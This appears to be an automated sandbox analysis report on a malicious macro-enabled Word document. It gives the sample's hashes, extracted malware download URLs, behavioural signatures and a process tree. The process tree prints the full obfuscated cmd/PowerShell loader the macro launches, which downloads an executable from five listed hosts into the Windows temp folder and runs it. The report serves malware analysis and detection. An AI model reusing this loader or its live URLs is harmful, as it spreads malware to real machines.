Analysis
-
max time kernel
100s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
07-06-2022 17:47
Static task
static1
Behavioral task
behavioral1
Sample
1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020.docm
Resource
win10v2004-20220414-en
General
-
Target
1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020.docm
-
Size
94KB
-
MD5
17160cfc8b8c0401f0d2063a615fb133
-
SHA1
baba76bfcc698be2fd98574ba2bdcf894a9c3c16
-
SHA256
1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020
-
SHA512
e88185760d15ff0c0eb7f83a111393f4bb309387f6533875958f9f5fb5208ad0b2566157b5986db4462711bb2982fa5ac10a4e84803e11c2e5a1073fe54fdf3c
Malware Config
Extracted
http://japanijob.com/UUC8iEfIfb
http://103.11.22.51/wp-content/uploads/yoarKX9
http://13.126.28.98/hPwXcgCZBx
http://159.65.146.232/ugitr4t4L
http://159.65.65.213/iz1Cc1GhZ
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4580 4972 cmd.exe 51 -
Blocklisted process makes network request 6 IoCs
flow pid Process 20 4668 powershell.exe 24 4668 powershell.exe 25 4668 powershell.exe 47 4668 powershell.exe 48 4668 powershell.exe 49 4668 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4972 WINWORD.EXE 4972 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4668 powershell.exe 4668 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4668 powershell.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 4972 WINWORD.EXE 4972 WINWORD.EXE 4972 WINWORD.EXE 4972 WINWORD.EXE 4972 WINWORD.EXE 4972 WINWORD.EXE 4972 WINWORD.EXE 4972 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4972 wrote to memory of 4580 4972 WINWORD.EXE 83 PID 4972 wrote to memory of 4580 4972 WINWORD.EXE 83 PID 4580 wrote to memory of 4668 4580 cmd.exe 85 PID 4580 wrote to memory of 4668 4580 cmd.exe 85
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\SYSTEM32\cmd.execmd /c set x=pow&& set y=ersh&& set z=ell&& call %x%%y%%z% $Lbi2C = '$zmlXw8L = new-obj000ect -com000obj000ect wsc000ript.she000ll;$OeRVbsv = new-object sys000tem.net.web000client;$C8OLj = new-object random;$nrwmj = \"000h000t000t000p000://japanijob.com/UUC8iEfIfb,000h000t000t000p000://103.11.22.51/wp-content/uploads/yoarKX9,000h000t000t000p000://13.126.28.98/hPwXcgCZBx,000h000t000t000p000://159.65.146.232/ugitr4t4L,000h000t000t000p000://159.65.65.213/iz1Cc1GhZ\".spl000it(\",\");$MRBKOMiTz = $C8OLj.nex000t(1, 65536);$l1u8gi4t = \"c:\win000dows\tem000p\95.ex000e\";for000each($iGSfRnt in $nrwmj){try{$OeRVbsv.dow000nlo000adf000ile($iGSfRnt.ToS000tring(), $l1u8gi4t);sta000rt-pro000cess $l1u8gi4t;break;}catch{}}'.replace('000', $j3ciVLYh);$OXlJrGA7 = '';iex($Lbi2C);2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $Lbi2C = '$zmlXw8L = new-obj000ect -com000obj000ect wsc000ript.she000ll;$OeRVbsv = new-object sys000tem.net.web000client;$C8OLj = new-object random;$nrwmj = \"000h000t000t000p000://japanijob.com/UUC8iEfIfb,000h000t000t000p000://103.11.22.51/wp-content/uploads/yoarKX9,000h000t000t000p000://13.126.28.98/hPwXcgCZBx,000h000t000t000p000://159.65.146.232/ugitr4t4L,000h000t000t000p000://159.65.65.213/iz1Cc1GhZ\".spl000it(\",\");$MRBKOMiTz = $C8OLj.nex000t(1, 65536);$l1u8gi4t = \"c:\win000dows\tem000p\95.ex000e\";for000each($iGSfRnt in $nrwmj){try{$OeRVbsv.dow000nlo000adf000ile($iGSfRnt.ToS000tring(), $l1u8gi4t);sta000rt-pro000cess $l1u8gi4t;break;}catch{}}'.replace('000', $j3ciVLYh);$OXlJrGA7 = '';iex($Lbi2C);3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-